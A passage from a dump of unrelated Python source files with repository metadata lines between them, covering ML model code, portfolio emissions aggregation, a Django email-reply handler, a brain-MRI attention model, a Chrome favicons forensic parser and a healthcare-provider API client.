new_id_3 = ids[3].view(-1, self.args.max_source_length)
new_id_4 = ids[4].view(-1, self.args.max_source_length)
new_id_5 = ids[5].view(-1, self.args.max_source_length)
new_id_6 = ids[6].view(-1, self.args.max_source_length)
new_id_7 = ids[7].view(-1, self.args.max_source_length)
#size(1,512)
vec_0 = self.get_t5_vec(new_id_0)
vec_1 = self.get_t5_vec(new_id_1)
vec_2 = self.get_t5_vec(new_id_2)
vec_3 = self.get_t5_vec(new_id_3)
vec_4 = self.get_t5_vec(new_id_4)
vec_5 = self.get_t5_vec(new_id_5)
vec_6 = self.get_t5_vec(new_id_6)
vec_7 = self.get_t5_vec(new_id_7)
vec_0 = ReverseLayerF.apply(vec_0,lam)
vec_1 = ReverseLayerF.apply(vec_1,lam)
vec_2 = ReverseLayerF.apply(vec_2,lam)
vec_3 = ReverseLayerF.apply(vec_3,lam)
vec_4 = ReverseLayerF.apply(vec_4,lam)
vec_5 = ReverseLayerF.apply(vec_5,lam)
vec_6 = ReverseLayerF.apply(vec_6,lam)
vec_7 = ReverseLayerF.apply(vec_7,lam)
domain_logit_0 = self.domain_classifier(vec_0)
domain_logit_1 = self.domain_classifier(vec_1)
domain_logit_2 = self.domain_classifier(vec_2)
domain_logit_3 = self.domain_classifier(vec_3)
domain_logit_4 = self.domain_classifier(vec_4)
domain_logit_5 = self.domain_classifier(vec_5)
domain_logit_6 = self.domain_classifier(vec_6)
domain_logit_7 = self.domain_classifier(vec_7)
domain_prob_7 = nn.functional.softmax(domain_logit_7)
weight = domain_prob_7[0][:-1]
weight = nn.functional.softmax(weight)
domain_cls_loss_0 = loss_fct(domain_logit_0, domain_labels[0])
domain_cls_loss_1 = loss_fct(domain_logit_1, domain_labels[1])
domain_cls_loss_2 = loss_fct(domain_logit_2, domain_labels[2])
domain_cls_loss_3 = loss_fct(domain_logit_3, domain_labels[3])
domain_cls_loss_4 = loss_fct(domain_logit_4, domain_labels[4])
domain_cls_loss_5 = loss_fct(domain_logit_5, domain_labels[5])
domain_cls_loss_6 = loss_fct(domain_logit_6, domain_labels[6])
domain_cls_loss_7 = loss_fct(domain_logit_7, domain_labels[7])
w_domain_cls_loss = w_domain[0]*domain_cls_loss_0 +w_domain[1]*domain_cls_loss_1 +w_domain[2]*domain_cls_loss_2 +w_domain[3]*domain_cls_loss_3 +w_domain[4]*domain_cls_loss_4 +w_domain[5]*domain_cls_loss_5 +w_domain[6]*domain_cls_loss_6 +w_domain[7]*domain_cls_loss_7
# w_domain_cls_loss = domain_cls_loss_0+domain_cls_loss_1+domain_cls_loss_2 +domain_cls_loss_3 +domain_cls_loss_4 +domain_cls_loss_5 +domain_cls_loss_6 +domain_cls_loss_7
# loss = 0.01*w_domain_cls_loss/8
loss = 0.01*w_domain_cls_loss
return loss,weight
class DefectModel2(nn.Module):
def __init__(self, encoder, config, tokenizer, args,**kwargs):
super(DefectModel2, self).__init__()
self.encoder = encoder
self.config = config
self.tokenizer = tokenizer
self.classifier = nn.Linear(config.hidden_size, 44)
self.args = args
self.MMDLoss = MMDLoss(**kwargs)
def get_t5_vec(self, source_ids):
attention_mask = source_ids.ne(self.tokenizer.pad_token_id)
outputs = self.encoder(input_ids=source_ids, attention_mask=attention_mask,
labels=source_ids, decoder_attention_mask=attention_mask, output_hidden_states=True)
hidden_states = outputs['decoder_hidden_states'][-1]
eos_mask = source_ids.eq(self.config.eos_token_id)
if len(torch.unique(eos_mask.sum(1))) > 1:
raise ValueError("All examples must have the same number of <eos> tokens.")
vec = hidden_states[eos_mask, :].view(hidden_states.size(0), -1,
hidden_states.size(-1))[:, -1, :]
return vec
def forward(self, ids=None, labels = None,train=True,w=None):
loss_fct = nn.CrossEntropyLoss()
if train:
new_id_0 = ids[0].view(-1, self.args.max_source_length)
new_id_1 = ids[1].view(-1, self.args.max_source_length)
new_id_2 = ids[2].view(-1, self.args.max_source_length)
new_id_3 = ids[3].view(-1, self.args.max_source_length)
new_id_4 = ids[4].view(-1, self.args.max_source_length)
new_id_5 = ids[5].view(-1, self.args.max_source_length)
new_id_6 = ids[6].view(-1, self.args.max_source_length)
new_id_7 = ids[7].view(-1, self.args.max_source_length)
vec_0 = self.get_t5_vec(new_id_0)
vec_1 = self.get_t5_vec(new_id_1)
vec_2 = self.get_t5_vec(new_id_2)
vec_3 = self.get_t5_vec(new_id_3)
vec_4 = self.get_t5_vec(new_id_4)
vec_5 = self.get_t5_vec(new_id_5)
vec_6 = self.get_t5_vec(new_id_6)
vec_7 = self.get_t5_vec(new_id_7)
logit_0 = self.classifier(vec_0)
logit_1 = self.classifier(vec_1)
logit_2 = self.classifier(vec_2)
logit_3 = self.classifier(vec_3)
logit_4 = self.classifier(vec_4)
logit_5 = self.classifier(vec_5)
logit_6 = self.classifier(vec_6)
logit_7 = self.classifier(vec_7)
dis_loss_0 = self.MMDLoss(vec_0, vec_7)
dis_loss_1 = self.MMDLoss(vec_1, vec_7)
dis_loss_2 = self.MMDLoss(vec_2, vec_7)
dis_loss_3 = self.MMDLoss(vec_3, vec_7)
dis_loss_4 = self.MMDLoss(vec_4, vec_7)
dis_loss_5 = self.MMDLoss(vec_5, vec_7)
dis_loss_6 = self.MMDLoss(vec_6, vec_7)
cls_loss_0 = loss_fct(logit_0, labels[0])
cls_loss_1 = loss_fct(logit_1, labels[1])
cls_loss_2 = loss_fct(logit_2, labels[2])
cls_loss_3 = loss_fct(logit_3, labels[3])
cls_loss_4 = loss_fct(logit_4, labels[4])
cls_loss_5 = loss_fct(logit_5, labels[5])
cls_loss_6 = loss_fct(logit_6, labels[6])
w_dis_loss = w[0].item()*dis_loss_0 + w[1].item()*dis_loss_1 +w[2].item()*dis_loss_2 +w[3].item()*dis_loss_3 +w[4].item()*dis_loss_4 +w[5].item()*dis_loss_5 +w[6].item()*dis_loss_6
#w_dis_loss = dis_loss_0 + dis_loss_1 +dis_loss_2 +dis_loss_3 +dis_loss_4 +dis_loss_5 +dis_loss_6
w_cls_loss = cls_loss_0 + cls_loss_1 +cls_loss_2 +cls_loss_3 +cls_loss_4 +cls_loss_5 +cls_loss_6
loss = 0.015*w_dis_loss + w_cls_loss/7
return loss
else:
source_ids = ids.view(-1, self.args.max_source_length)
vec = self.get_t5_vec(source_ids)
logits = self.classifier(vec)
prob = nn.functional.softmax(logits)
loss = loss_fct(logits, labels)
return loss, prob,vec
class Beam(object):
def __init__(self, size, sos, eos):
self.size = size
self.tt = torch.cuda
# The score for each translation on the beam.
self.scores = self.tt.FloatTensor(size).zero_()
# The backpointers at each time-step.
self.prevKs = []
# The outputs at each time-step.
self.nextYs = [self.tt.LongTensor(size)
.fill_(0)]
self.nextYs[0][0] = sos
# Has EOS topped the beam yet.
self._eos = eos
self.eosTop = False
# Time and k pair for finished.
self.finished = []
def getCurrentState(self):
"Get the outputs for the current timestep."
batch = self.tt.LongTensor(self.nextYs[-1]).view(-1, 1)
return batch
def getCurrentOrigin(self):
"Get the backpointers for the current timestep."
return self.prevKs[-1]
def advance(self, wordLk):
"""
Given prob over words for every last beam `wordLk` and attention
`attnOut`: Compute and update the beam search.
Parameters:
* `wordLk`- probs of advancing from the last step (K x words)
* `attnOut`- attention at the last step
Returns: True if beam search is complete.
"""
numWords = wordLk.size(1)
# Sum the previous scores.
if len(self.prevKs) > 0:
beamLk = wordLk + self.scores.unsqueeze(1).expand_as(wordLk)
# Don't let EOS have children.
for i in range(self.nextYs[-1].size(0)):
if self.nextYs[-1][i] == self._eos:
beamLk[i] = -1e20
else:
beamLk = wordLk[0]
flatBeamLk = beamLk.view(-1)
bestScores, bestScoresId = flatBeamLk.topk(self.size, 0, True, True)
self.scores = bestScores
# bestScoresId is flattened beam x word array, so calculate which
# word and beam each score came from
prevK = bestScoresId // numWords
self.prevKs.append(prevK)
self.nextYs.append((bestScoresId - prevK * numWords))
for i in range(self.nextYs[-1].size(0)):
if self.nextYs[-1][i] == self._eos:
s = self.scores[i]
self.finished.append((s, len(self.nextYs) - 1, i))
# End condition is when top-of-beam is EOS and no global score.
if self.nextYs[-1][0] == self._eos:
self.eosTop = True
def done(self):
return self.eosTop and len(self.finished) >= self.size
def getFinal(self):
if len(self.finished) == 0:
self.finished.append((self.scores[0], len(self.nextYs) - 1, 0))
self.finished.sort(key=lambda a: -a[0])
if len(self.finished) != self.size:
unfinished = []
for i in range(self.nextYs[-1].size(0)):
if self.nextYs[-1][i] != self._eos:
s = self.scores[i]
unfinished.append((s, len(self.nextYs) - 1, i))
unfinished.sort(key=lambda a: -a[0])
self.finished += unfinished[:self.size - len(self.finished)]
return self.finished[:self.size]
def getHyp(self, beam_res):
"""
Walk back to construct the full hypothesis.
"""
hyps = []
for _, timestep, k in beam_res:
hyp = []
for j in range(len(self.prevKs[:timestep]) - 1, -1, -1):
hyp.append(self.nextYs[j + 1][k])
k = self.prevKs[j][k]
hyps.append(hyp[::-1])
return hyps
def buildTargetTokens(self, preds):
sentence = []
for pred in preds:
tokens = []
for tok in pred:
if tok == self._eos:
break
tokens.append(tok)
sentence.append(tokens)
return sentence
| starve123456/copilot | copilot/models.py | models.py | py | 13,544 | python | en | code | 0 | github-code | 90 |
15427394462 | from abc import ABC
from enum import Enum
import warnings # needed until apply behaves better with Pint quantities in arrays
from typing import Type
from pint import Quantity
from pint_pandas import PintArray
import pandas as pd
import pint
import pint_pandas
ureg = pint.get_application_registry()
Q_ = ureg.Quantity
PA_ = pint_pandas.PintArray
from .configs import PortfolioAggregationConfig, ColumnsConfig
from .interfaces import EScope
class PortfolioAggregationMethod(Enum):
"""
The portfolio aggregation method determines how the temperature scores for the individual companies are aggregated
into a single portfolio score.
"""
WATS = 'WATS'
TETS = 'TETS'
MOTS = 'MOTS'
EOTS = 'EOTS'
ECOTS = 'ECOTS'
AOTS = 'AOTS'
ROTS = 'ROTS'
@staticmethod
def is_emissions_based(method: 'PortfolioAggregationMethod') -> bool:
"""
Check whether a given method is emissions-based (i.e. it uses the emissions to calculate the aggregation).
:param method: The method to check
:return:
"""
return method in [PortfolioAggregationMethod.MOTS, PortfolioAggregationMethod.EOTS,
PortfolioAggregationMethod.ECOTS, PortfolioAggregationMethod.AOTS,
PortfolioAggregationMethod.ROTS]
@staticmethod
def get_value_column(method: 'PortfolioAggregationMethod', column_config: Type[ColumnsConfig]) -> str:
map_value_column = {
PortfolioAggregationMethod.MOTS: column_config.COMPANY_MARKET_CAP,
PortfolioAggregationMethod.EOTS: column_config.COMPANY_ENTERPRISE_VALUE,
PortfolioAggregationMethod.ECOTS: column_config.COMPANY_EV_PLUS_CASH,
PortfolioAggregationMethod.AOTS: column_config.COMPANY_TOTAL_ASSETS,
PortfolioAggregationMethod.ROTS: column_config.COMPANY_REVENUE,
}
return map_value_column.get(method, column_config.COMPANY_MARKET_CAP)
class PortfolioAggregation(ABC):
"""
This class is a base class that provides portfolio aggregation calculation.
:param config: A class defining the constants that are used throughout this class. This parameter is only required
if you'd like to overwrite a constant. This can be done by extending the PortfolioAggregationConfig
class and overwriting one of the parameters.
"""
def __init__(self, config: Type[PortfolioAggregationConfig] = PortfolioAggregationConfig):
self.c = config
def _check_column(self, data: pd.DataFrame, column: str):
"""
Check if a certain column is filled for all companies. If not throw an error.
:param data: The data to check
:param column: The column to check
:return:
"""
missing_data = data[pd.isnull(data[column])][self.c.COLS.COMPANY_NAME].unique()
if len(missing_data):
raise ValueError("The value for {} is missing for the following companies: {}".format(
column, ", ".join(missing_data)
))
def _calculate_aggregate_score(self, data: pd.DataFrame, input_column: str,
portfolio_aggregation_method: PortfolioAggregationMethod) -> pd.Series:
"""
Aggregate the scores in a given column based on a certain portfolio aggregation method.
:param data: The data to run the calculations on
:param input_column: The input column (containing the scores)
:param portfolio_aggregation_method: The method to use
:return: The aggregates score as a pd.Series
"""
if portfolio_aggregation_method == PortfolioAggregationMethod.WATS:
total_investment_weight = data[self.c.COLS.INVESTMENT_VALUE].sum()
try:
with warnings.catch_warnings():
warnings.simplefilter("ignore")
# See https://github.com/hgrecco/pint-pandas/issues/114
weights_series = pd.Series(data.apply(
lambda row: row[self.c.COLS.INVESTMENT_VALUE] * row[input_column] / total_investment_weight,
axis=1))
return weights_series
except ZeroDivisionError:
raise ValueError("The portfolio weight is not allowed to be zero")
# Total emissions weighted temperature score (TETS)
elif portfolio_aggregation_method == PortfolioAggregationMethod.TETS:
use_S1S2 = data[self.c.COLS.SCOPE].isin([EScope.S1S2, EScope.S1S2S3])
use_S3 = data[self.c.COLS.SCOPE].isin([EScope.S3, EScope.S1S2S3])
if use_S3.any():
self._check_column(data, self.c.COLS.GHG_SCOPE3)
if use_S1S2.any():
self._check_column(data, self.c.COLS.GHG_SCOPE12)
# Calculate the total emissions of all companies
emissions = data.loc[use_S1S2, self.c.COLS.GHG_SCOPE12].sum() + data.loc[use_S3, self.c.COLS.GHG_SCOPE3].sum()
try:
weights_series = pd.Series((data[self.c.COLS.GHG_SCOPE12].where(use_S1S2,0) + data[self.c.COLS.GHG_SCOPE3].where(use_S3, 0)) \
/ emissions * data[input_column])
return weights_series
except ZeroDivisionError:
raise ValueError("The total emissions should be higher than zero")
elif PortfolioAggregationMethod.is_emissions_based(portfolio_aggregation_method):
# These four methods only differ in the way the company is valued.
value_column = PortfolioAggregationMethod.get_value_column(portfolio_aggregation_method, self.c.COLS)
# Calculate the total owned emissions of all companies
try:
self._check_column(data, self.c.COLS.INVESTMENT_VALUE)
self._check_column(data, value_column)
use_S1S2 = data[self.c.COLS.SCOPE].isin([EScope.S1S2, EScope.S1S2S3])
use_S3 = data[self.c.COLS.SCOPE].isin([EScope.S3, EScope.S1S2S3])
if use_S1S2.any():
self._check_column(data, self.c.COLS.GHG_SCOPE12)
if use_S3.any():
self._check_column(data, self.c.COLS.GHG_SCOPE3)
data[self.c.COLS.OWNED_EMISSIONS] = (data[self.c.COLS.INVESTMENT_VALUE] / data[value_column]) * (
data[self.c.COLS.GHG_SCOPE12].where(use_S1S2, 0) + data[self.c.COLS.GHG_SCOPE3].where(use_S3, 0))
except ZeroDivisionError:
raise ValueError("To calculate the aggregation, the {} column may not be zero".format(value_column))
owned_emissions = data[self.c.COLS.OWNED_EMISSIONS].sum()
try:
# Calculate the MOTS value per company
with warnings.catch_warnings():
warnings.simplefilter("ignore")
result = data.apply(
lambda row: (row[self.c.COLS.OWNED_EMISSIONS] / owned_emissions) * row[input_column],
axis=1)
return result
except ZeroDivisionError:
raise ValueError("The total owned emissions can not be zero")
else:
raise ValueError("The specified portfolio aggregation method is invalid")
| sijilo/ITR | ITR/portfolio_aggregation.py | portfolio_aggregation.py | py | 7,339 | python | en | code | null | github-code | 90 |
18389391279 | import sys
def solve():
input = sys.stdin.readline
N = int(input())
W = [int(w) for w in input().split()]
wt = [0] * (N + 1)
for i, w in enumerate(W):
wt[i+1] = wt[i] + w
minD = 1000000
for i in range(N):
minD = min(minD, abs(wt[i+1] - (wt[N] - wt[i+1])))
print(minD)
return 0
if __name__ == "__main__":
solve() | Aasthaengg/IBMdataset | Python_codes/p03012/s944300316.py | s944300316.py | py | 370 | python | en | code | 0 | github-code | 90 |
22824784325 | from django.contrib.auth.mixins import LoginRequiredMixin
from django.db.models import Count
from django.db.transaction import on_commit
from django.http import HttpResponse, HttpResponseRedirect
from django.urls import reverse_lazy
from django.views.decorators.csrf import csrf_exempt
from django.views.generic import CreateView, DetailView, ListView
from email import message_from_string
from email.utils import parseaddr
import re
import dateutil.parser
from .models import EmailMessage, ReceivedEmailMessage, EmailHeader
from .forms import EmailMessageForm
from .tasks import send_email_task
class EmailCreateView(LoginRequiredMixin, CreateView):
model = EmailMessage
form_class = EmailMessageForm
success_url = reverse_lazy('emails:list')
def form_valid(self, form):
self.object = form.save()
self.object.sender_name = 'Notifications'
self.object.sender_email_address = \
'alerts@notifications.chrismcdonald.ltd'
self.object.html_content = ''
self.object.save()
on_commit(lambda: send_email_task.delay(self.object.id))
return HttpResponseRedirect(self.get_success_url())
class EmailDetailView(LoginRequiredMixin, DetailView):
model = EmailMessage
# These next two lines tell the view to index lookups by id
slug_field = 'id'
slug_url_kwarg = 'id'
def get_context_data(self, **kwargs):
# Call the base implementation first to get a context
context = super().get_context_data(**kwargs)
email_message = self.get_object()
return context
class EmailListView(LoginRequiredMixin, ListView):
model = EmailMessage
# These next two lines tell the view to index lookups by id
slug_field = 'id'
slug_url_kwarg = 'id'
def get_queryset(self):
queryset = super(EmailListView, self).get_queryset()
return queryset.order_by('-id').annotate(reply_count=Count('receivedemailmessage'))
def get_context_data(self, **kwargs):
# Call the base implementation first to get a context
context = super().get_context_data(**kwargs)
context['form'] = EmailMessageForm()
return context
@csrf_exempt
def parse(request):
print(request.body)
data = request.body.decode('utf8')
print(data)
email_message = message_from_string(data)
# get all headers
headers = email_message.items()
# get a single header
subject = email_message.get('Subject')
from_address = email_message.get('From')
sender_name, sender_email = parseaddr(from_address)
date = dateutil.parser.parse(
email_message.get('Date'))
to_address = email_message.get('To')
recipient_name, recipient_email = parseaddr(to_address)
received_email = ReceivedEmailMessage(
sender_name=sender_name,
sender_email_address=sender_email,
recipient_name=recipient_name,
recipient_email_address=recipient_email,
date=date,
subject=subject)
if email_message.is_multipart():
messages = email_message.get_payload()
for sub_message in messages:
content = sub_message.get_payload(decode=True)
decoded_content = content.decode(
encoding=sub_message.get_content_charset())
# content type could be 'text/plain',
# 'text/html' or any MIME type (attachments)
content_type = sub_message.get_content_type()
if content_type == 'text/plain':
received_email.plain_content = decoded_content
elif content_type == 'text/html':
received_email.html_content = decoded_content
received_email.save()
for name, value in headers:
received_email.headers.add(
EmailHeader.objects.create(name=name, value=value))
if name == 'In-Reply-To':
p = re.compile('<(.*)@eu-west-1.amazonses.com>')
match = p.match(value)
if match:
message_id = match.group(1)
try:
email_message = EmailMessage.objects.get(
message_id=message_id)
received_email.reply_to_email = email_message
except EmailMessage.DoesNotExist:
print('Unable to find matching message id')
return HttpResponse(status=403)
received_email.save()
return HttpResponse(status=201)
| chrismcband/email-reply-demo | email_reply_demo/emails/views.py | views.py | py | 4,448 | python | en | code | 0 | github-code | 90 |
4186524842 | """code for attention models"""
import torch
from box import Box
from torch import nn
from src.arch.slice_cnn_utils import Encoder1_2D, MaxPool, MeanPool, PooledAttention, ResNetEncoder
class MRI2DSlice(nn.Module):
def __init__(
self, attn_num_heads, attn_dim, attn_drop=False, agg_fn="attention", in_channel=1,
slice_dim=1, use_position_encoding=False, encoder_2d=None, resnet_module="resnet18",
load_pretrained_encoder=False, initialization="custom", *args, **kwargs
):
super(MRI2DSlice, self).__init__()
self.input_dim = [(1, 109, 91), (91, 1, 91), (91, 109, 1)][slice_dim - 1]
self.num_slices = [91, 109, 91][slice_dim - 1]
self.initialization = initialization
self.num_heads = attn_num_heads
self.attn_dim = attn_dim
self.attn_drop = attn_drop
self.agg_fn = agg_fn
self.slice_dim = slice_dim
self.use_position_encoding = use_position_encoding
self.encoder_2d_name = encoder_2d
self.load_pretrained_encoder = load_pretrained_encoder
self.resnet_module = resnet_module
self.in_channel = in_channel
self.encoder_2d = self.create_2d_encoder()
if agg_fn == "attention":
self.pooled_attention = PooledAttention(
input_dim=self.num_heads * self.attn_dim,
dim_v=self.num_heads * self.attn_dim,
dim_k=self.num_heads * self.attn_dim,
num_heads=self.num_heads, ln=True
)
elif agg_fn == "mean":
self.pooled_attention = MeanPool()
elif agg_fn == "max":
self.pooled_attention = MaxPool()
else:
raise Exception("Invalid attention function")
# Build regressor
self.attn_post = nn.Linear(self.num_heads * self.attn_dim, 64)
self.regressor = nn.Sequential(nn.ReLU(), nn.Linear(64, 1))
self.init_weights()
# some precomputed things for creating inputs
self.collation_indices = list(
zip(*[list(range(i, self.num_slices)) for i in range(in_channel)])
)
def create_2d_encoder(self):
if self.encoder_2d_name == "encoder1":
return Encoder1_2D(
self.num_heads * self.attn_dim, self.slice_dim, in_channel=self.in_channel,
use_position_encoding=self.use_position_encoding, dropout=self.attn_drop,
post_proc_conv=None, encoder_2d=None, post_position_encoding=None
)
if "resnet" in self.encoder_2d_name:
return ResNetEncoder(
self.num_heads * self.attn_dim, self.slice_dim, in_channel=self.in_channel,
use_position_encoding=self.use_position_encoding, dropout=self.attn_drop,
resnet_module=self.encoder_2d_name, pretrained=self.load_pretrained_encoder
)
def init_weights(self):
if "resnet" in self.encoder_2d_name or self.initialization == "default":
# only keep this init
for k, m in self.named_modules():
if isinstance(m, nn.Linear) and "regressor" in k:
m.bias.data.fill_(62.68)
else:
for k, m in self.named_modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(
m.weight, mode="fan_out",
nonlinearity="relu"
)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear) and "regressor" in k:
m.bias.data.fill_(62.68)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.constant_(m.bias, 0)
def encode(self, x):
B, C, H, W, D = x.size()
# remove channel dimension as it is 1.
x = x.squeeze(1)
if self.slice_dim == 1:
# collation indices are list of tuple, so the "i" is a tuple and shape will be x,1,y,z
new_input = torch.cat([x[:, i, :, :] for i in self.collation_indices], dim=0)
encoding = self.encoder_2d(new_input)
encoding = torch.cat(
[i.unsqueeze(2) for i in torch.split(encoding, B, dim=0)],
dim=2
)
# note: squeezing without proper arguments is bad because batch dim can be dropped
encoding = encoding.squeeze(4).squeeze(3)
elif self.slice_dim == 2:
new_input = torch.cat([x[:, :, i, :] for i in self.collation_indices], dim=0)
new_input = torch.swapaxes(new_input, 1, 2)
encoding = self.encoder_2d(new_input)
encoding = torch.cat(
[i.unsqueeze(3) for i in torch.split(encoding, B, dim=0)],
dim=3
)
# note: squeezing without proper arguments is bad because batch dim can be dropped
encoding = encoding.squeeze(4).squeeze(2)
elif self.slice_dim == 3:
new_input = torch.cat([x[:, :, :, i] for i in self.collation_indices], dim=0)
new_input = torch.swapaxes(new_input, 1, 3)
new_input = torch.swapaxes(new_input, 2, 3)
encoding = self.encoder_2d(new_input)
encoding = torch.cat(
[i.unsqueeze(4) for i in torch.split(encoding, B, dim=0)],
dim=4
)
# note: squeezing without proper arguments is bad because batch dim can be dropped
encoding = encoding.squeeze(3).squeeze(2)
else:
raise Exception("Invalid slice dim")
# swap dims for input to attention
encoding = encoding.permute((0, 2, 1))
encoding, attention = self.pooled_attention(encoding)
return encoding.squeeze(1), attention
def forward(self, x):
embedding, attention = self.encode(x)
post = self.attn_post(embedding)
y_pred = self.regressor(post)
return Box({"y_pred": y_pred, "attention": attention})
def get_attention(self, x):
_, attention = self.encode(x)
return attention
def get_arch(*args, **kwargs):
return {"net": MRI2DSlice(*args, **kwargs)}
| umgupta/2d-slice-set-networks | src/arch/ukbb/brain_age_slice_set.py | brain_age_slice_set.py | py | 6,276 | python | en | code | 5 | github-code | 90 |
18493066569 | #!/usr/bin/env python
# coding: utf-8
# In[16]:
S = input()
T = input()
# In[20]:
mydict = {}
for i in range(len(S)):
if S[i] in mydict:
if T[i] != mydict[S[i]]:
ans = "No"
break
else:
mydict[S[i]] = T[i]
else:
a = list(mydict.values())
b = list(set(a))
if len(b) != len(a):
ans = "No"
else:
ans = "Yes"
print(ans)
# In[ ]:
| Aasthaengg/IBMdataset | Python_codes/p03252/s375616547.py | s375616547.py | py | 417 | python | en | code | 0 | github-code | 90 |
44485831703 | from riplib.Plugin import Plugin
import codecs
import logging
import os
import riplib.osxripper_time
import sqlite3
__author__ = 'osxripper'
__version__ = '0.1'
__license__ = 'GPLv3'
class UsersChromeFavicons(Plugin):
"""
Parse information from /Users/<username>/Library/Application Support/Google/Chrome/Default/Favicons
"""
def __init__(self):
"""
Initialise the class.
"""
super().__init__()
self._name = "User Chrome Browser FavIcons"
self._description = "Parse information from " \
"/Users/<username>/Library/Application Support/Google/Chrome/Default/Favicons"
self._data_file = "Favicons"
self._output_file = "" # this will have to be defined per user account
self._type = "sqlite"
def parse(self):
"""
Iterate over /Users directory and find user sub-directories
"""
users_path = os.path.join(self._input_dir, "Users")
# username = None
if os.path.isdir(users_path):
user_list = os.listdir(users_path)
for username in user_list:
if os.path.isdir(os.path.join(users_path, username)) and not username == "Shared":
history_path = os.path\
.join(users_path, username, "Library", "Application Support", "Google", "Chrome", "Default")
if os.path.isdir(history_path):
self.__parse_sqlite_db(history_path, username)
else:
logging.warning("{0} does not exist.".format(history_path))
print("[WARNING] {0} does not exist.".format(history_path))
else:
logging.warning("{0} does not exist.".format(users_path))
print("[WARNING] {0} does not exist.".format(users_path))
def __parse_sqlite_db(self, file, username):
"""
Read the Favicons SQLite database
"""
with codecs.open(os.path.join(self._output_dir, "Users_" + username + "_Chrome_Favicons.txt"),
"a", encoding="utf-8") as of:
of.write("="*10 + " " + self._name + " " + "="*10 + "\r\n")
history_db = os.path.join(file, self._data_file)
query = "SELECT im.page_url,fi.url,fb.last_updated FROM " \
"favicon_bitmaps fb,favicons fi,icon_mapping im WHERE fb.icon_id = fi.id AND im.icon_id = fi.id"
if os.path.isfile(history_db):
of.write("Source File: {0}\r\n\r\n".format(history_db))
conn = None
try:
conn = sqlite3.connect(history_db)
conn.row_factory = sqlite3.Row
with conn:
cur = conn.cursor()
cur.execute(query)
rows = cur.fetchall()
for row in rows:
last_updated = riplib.osxripper_time.get_gregorian_micros(row["last_updated"])
of.write("Page URL : {0}\r\n".format(row["page_url"]))
of.write("Icon URL : {0}\r\n".format(row["url"]))
of.write("Last Updated: {0}\r\n".format(last_updated))
of.write("\r\n")
except sqlite3.Error as e:
logging.error("{0}".format(e.args[0]))
print("[ERROR] {0}".format(e.args[0]))
finally:
if conn:
conn.close()
else:
logging.warning("File: {0} does not exist or cannot be found.\r\n".format(file))
of.write("[WARNING] File: {0} does not exist or cannot be found.\r\n".format(file))
print("[WARNING] File: {0} does not exist or cannot be found.".format(file))
of.write("="*40 + "\r\n\r\n")
of.close()
| maurice-schuppe/osxripper | plugins/osx/UsersChromeFavicons.py | UsersChromeFavicons.py | py | 3,970 | python | en | code | 1 | github-code | 90 |
74117362856 | import json
import requests
import asyncio
import BetterDocModels
async def GetProviders(location_coordinates, recordLimit, skipCount):
mentalHealthSpecialties = ["mental-health-counselor", 'psychiatrist', "mental-health-nurse-practitioner",'clinical-psychologist', 'counseling-pshychologist', 'cognitive-behavioral-psychologist', 'psychologist']
baseUrl = 'https://api.betterdoctor.com/2016-03-01/practices'
user_key = '253c06706096f138941a110dbf3b0dfa'
parameterizedUrl = "{}?location={},{},{}&user_key={}&sort=distance-asc&limit={}&skip={}".format(baseUrl, location_coordinates.latitude, location_coordinates.longitude,
location_coordinates.searchAreaMiles, user_key, recordLimit, skipCount)
betterDocResponse = requests.get(parameterizedUrl)
json_data = json.loads(betterDocResponse.text)
fetchedCount = json_data['meta']['count']
totalCount = json_data['meta']['total']
willAcceptNewPatients = []
matchedLocations = []
for key in json_data['data']:
#Collect some location specific information if the practice is accepting new patients
if key['accepts_new_patients']:
doctorName = ""
# Some doctors don't have names so check before assiging
# For now, ignore locations that don't provide a primary name
if 'name' in key:
practiceInfo = BetterDocModels.location(key['visit_address'], key['phones'], key['insurance_uids'], key['doctors'], key['name'])
if 'distance' in key:
practiceInfo.distance = key['distance']
willAcceptNewPatients.append(practiceInfo)
for locations in willAcceptNewPatients:
for insurance in locations.acceptedInsurance:
if insurance == "medicaid-medicaid":
locations.isMedicaid = True
if insurance == "medicare-medicare":
locations.isMedicare = True
for phone in locations.phones:
if (phone["type"] == "landline"):
locations.landlinePhone = phone["number"]
for doctor in locations.doctors:
info = BetterDocModels.doctorInfo()
#Hack since I dont' know how to create new instance of object
info.specialties = []
info.npi = ""
if 'specialties' in doctor:
for specialty in doctor['specialties']:
doctorSpecialty = specialty["uid"]
if doctorSpecialty in mentalHealthSpecialties:
info.npi = doctor["npi"]
info.specialties.append(doctorSpecialty)
if (len(info.specialties) > 0):
displayInfo = BetterDocModels.flattenedInfo()
displayInfo.distance = locations.distance
displayInfo.isMedicaid = locations.isMedicaid
displayInfo.isMedicare = locations.isMedicare
displayInfo.name = locations.name
displayInfo.doctors = info
displayInfo.landlinePhone = "({}) {}-{}".format(locations.landlinePhone[0:3], locations.landlinePhone[3:6], locations.landlinePhone[6:10])
if 'street' in locations.locationAddress:
displayInfo.locationAddress = locations.locationAddress['street']
if 'street2' in locations.locationAddress:
displayInfo.locationAddress += ", " + locations.locationAddress['street2']
if 'city' in locations.locationAddress:
displayInfo.locationAddress += ", " + locations.locationAddress["city"]
matchedLocations.append(displayInfo)
response = BetterDocModels.apiResponse()
response.providers = matchedLocations
response.fetched = fetchedCount
response.total = totalCount
return response | charudut/DrCityYay | BetterDocApi.py | BetterDocApi.py | py | 3,935 | python | en | code | 0 | github-code | 90 |
18107269459 | def bubble_sort(c, n):
for i in range(n):
for j in range(n-1, i, -1):
if c[j][1] < c[j-1][1]:
c[j], c[j-1] = c[j-1], c[j]
return c
def selection_sort(c, n):
for i in range(n-1):
minj = i
for j in range(i+1, n):
if c[j][1] < c[minj][1]:
minj = j
if i != j:
c[i], c[minj] = c[minj], c[i]
return c
def main():
N = int(input())
cards1 = input().split()
cards2 = cards1.copy()
bubble_sorted = bubble_sort(cards1, N)
print(*bubble_sorted)
print("Stable")
select_sorted = selection_sort(cards2, N)
print(*select_sorted)
if bubble_sorted == select_sorted:
print("Stable")
else:
print("Not stable")
if __name__ == "__main__":
main()
| Aasthaengg/IBMdataset | Python_codes/p02261/s332392205.py | s332392205.py | py | 812 | python | en | code | 0 | github-code | 90 |
16465742603 | from moco_wrapper.models import objector_models as obj
class PlanningEntry(object):
def __init__(self, **kwargs):
nk = kwargs
if "project" in kwargs.keys() and kwargs["project"] is not None:
p = obj.Project(**kwargs["project"])
nk["project"] = p
if "user" in kwargs.keys() and kwargs["user"] is not None:
